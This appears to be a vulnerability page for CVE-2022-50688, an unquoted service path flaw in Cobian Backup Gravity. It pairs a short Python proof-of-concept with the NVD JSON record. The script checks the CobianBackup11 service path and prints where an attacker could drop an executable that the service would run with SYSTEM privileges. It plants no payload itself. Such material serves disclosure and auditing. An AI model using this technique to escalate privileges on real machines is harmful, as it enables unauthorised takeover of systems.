CVE-2022-50688

# CVE-2022-50688 PoC - Cobian Backup Gravity Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in CobianBackup11 service import subprocess import os import sys def check_vulnerable_service(): """Check if the CobianBackup11 service has an unquoted service path""" try: # Query service configuration using sc command result = subprocess.run( ['sc', 'qc', 'CobianBackup11'], capture_output=True, text=True ) output = result.stdout # Check for BINARY_PATH_NAME in output if 'BINARY_PATH_NAME' in output: print("[+] Found CobianBackup11 service") for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Service path: {path}") # Check if path is unquoted and contains spaces if ' ' in path and not path.startswith('"'): print("[!] VULNERABLE: Path is unquoted and contains spaces") return True, path else: print("[-] Service path is properly quoted or has no spaces") return False, path else: print("[-] CobianBackup11 service not found") return False, None except Exception as e: print(f"[-] Error checking service: {e}") return False, None def exploit_unquoted_path(): """ Exploit the unquoted service path vulnerability Attack: Place a malicious executable in a path component before the actual executable """ vulnerable, service_path = check_vulnerable_service() if not vulnerable: print("[-] Service is not vulnerable to unquoted path attack") return # Extract path components path_parts = service_path.replace('"', '').split('\\') # Find exploitable path component (contains space and before .exe) for i, part in enumerate(path_parts): if ' ' in part and not part.endswith('.exe'): exploit_path = '\\'.join(path_parts[:i+1]) + '.exe' print(f"[!] Potential exploit target: {exploit_path}") print(f"[!] An attacker could place malicious code at: {exploit_path}") print("[!] When the service restarts, this code will execute with SYSTEM privileges") break if __name__ == '__main__': print("="*60) print("CVE-2022-50688 - Cobian Backup Gravity Unquoted Service Path") print("="*60) exploit_unquoted_path() print("\n[!] Note: This PoC is for educational purposes only.")

{"cve": {"id": "CVE-2022-50688", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:15:59.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cobian Backup Gravity 11.2.0.582 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the CobianBackup11 service to inject malicious code that would execute with LocalSystem privileges during service startup."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.cobiansoft.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50791", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/cobian-backup-gravity-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}